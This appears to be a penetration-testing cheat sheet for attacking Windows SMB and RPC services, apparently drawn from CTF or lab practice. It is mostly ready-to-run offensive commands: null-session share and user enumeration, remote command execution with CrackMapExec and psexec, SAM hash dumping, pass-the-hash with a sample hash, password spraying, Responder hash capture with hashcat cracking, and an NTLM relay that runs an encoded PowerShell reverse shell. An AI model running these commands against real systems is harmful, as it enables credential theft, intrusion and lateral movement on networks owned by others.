SMB, RPC - ports 137,138,139,445,111
SMBclient
# List the shares using a null session (anonymous access, no password)
smbclient -N -L //ip
# Log in with no user/password and get a prompt for further enumeration
smbclient //ip/notes
# login with valid user and pass
smbclient -U 'user%pass' //ip/new-site
# Downloading a file
get filename
# Run local system commands from the smbclient prompt using !<cmd>
!ls
!cat something
# Check current connections to Samba (run on the Samba server)
smbstatus
Nmap SMB scripts
# Nmap scanning for smb
nmap ip -sV -sC -p139,445
# Nmap vulnerability scan (smb-vuln-* scripts)
nmap -p445 --script smb-vuln-* <target>
RPCclient
# nmap script scan
nmap -sV -p 111 --script=rpcinfo $RHOST
# If you find NFS-related services, enumerate those.
nmap -p 111 --script nfs* $RHOST
# Connect to the SMB server with a null session (empty username)
rpcclient -U "" ip
Some commands to get information:
----------------------- RPCclient Enumeration -------------------------
# Server information
srvinfo
# Enumerate all domains that are deployed in the network.
enumdomains
# Provides domain, server, and user information of deployed domains
querydominfo
# Enumerates all available shares.
netshareenumall
# Provides information about a specific share.
netsharetargetinfo <share>
----------------------- RPCclient User Enumeration ------------------------
# Enumerates all domain users.
enumdomusers
# Provides information about a specific user.
queryuser <RID>
----------------------- RPCclient Group Enumeration -----------------------
# Enumerates all domain groups.
enumdomgroups
# Provides information about the group with the given RID
querygroup 0x201
# Enumerates the members of the group with the given RID
querygroupmem 0x200
SMBmap
# Link : <https://github.com/ShawnDEvans/smbmap>
smbmap -H ip
smbmap -H ip -u eren
smbmap -R directory -H ip
smbmap -R directory -H ip -A Groups.xml -q
smbmap -d active.htb -u user -p password -H ip -R Users
smbmap -H ip --download "notes\\note.txt"
smbmap -H ip --upload test.txt "notes\\test.txt"
CrackMapExec
# Link : <https://github.com/Porchetta-Industries/CrackMapExec>
crackmapexec smb ip --shares -u '' -p ''
# To execute commands remotely
crackmapexec smb ip -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
# Enumerating Logged-on Users
crackmapexec smb 10.10.10.0/24 -u administrator -p 'Password123!' --loggedon-users
# Extract hashes from the SAM database
crackmapexec smb ip -u administrator -p 'Password123!' --sam
# Pass-the-Hash (PtH)
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
# Password spraying
crackmapexec smb ip -u /tmp/userlist.txt -p 'Company01!' --continue-on-success
Enum4linux-ng
# Link : <https://github.com/cddmp/enum4linux-ng>
# Installation
git clone https://github.com/cddmp/enum4linux-ng.git
cd enum4linux-ng
pip3 install -r requirements.txt
# Enumeration
./enum4linux-ng.py ip -A
./enum4linux-ng.py ip -A -C
PsExec
# To connect to a remote machine with a local administrator account
impacket-psexec administrator:'Password123!'@ip
Responder
# Create a fake SMB server using the Responder default configuration
responder -I <interface name>
sudo responder -I ens33
# NetNTLMv2 - crack the captured hash with hashcat (mode 5600)
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Can't crack the hash?
# impacket-ntlmrelayx
# It will dump the SAM database
impacket-ntlmrelayx --no-http-server -smb2support -t ip
# Relay the hash and execute a command, e.g. the base64-encoded reverse shell below
impacket-ntlmrelayx --no-http-server -smb2support -t ip -c 'powershell -e JABj----kA'
# CrackMapExec
# PassTheHash
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
Brute Forcing User RIDs
# Using the command line (bash loop)
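# Query RIDs 500-1100 over a null session and print the user name and
# RID/group RID lines for each RID that resolves, followed by a blank line.
# "ip" is the target host placeholder used throughout this page.
# Fix vs the original one-liner: the printf format was '%x\\n', which emits a
# literal backslash-n after the hex value and corrupts the "queryuser 0x..."
# argument; command substitution already strips the trailing newline, so
# '%x' alone is correct. "$i" is quoted and the BRE "\|" alternation is
# written as an ERE with -E.
for i in {500..1100}; do
  rpcclient -N -U "" ip -c "queryuser 0x$(printf '%x' "$i")" \
    | grep -E 'User Name|user_rid|group_rid' && echo ""
done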
# Python script from Impacket - samrdump.py
samrdump.py ip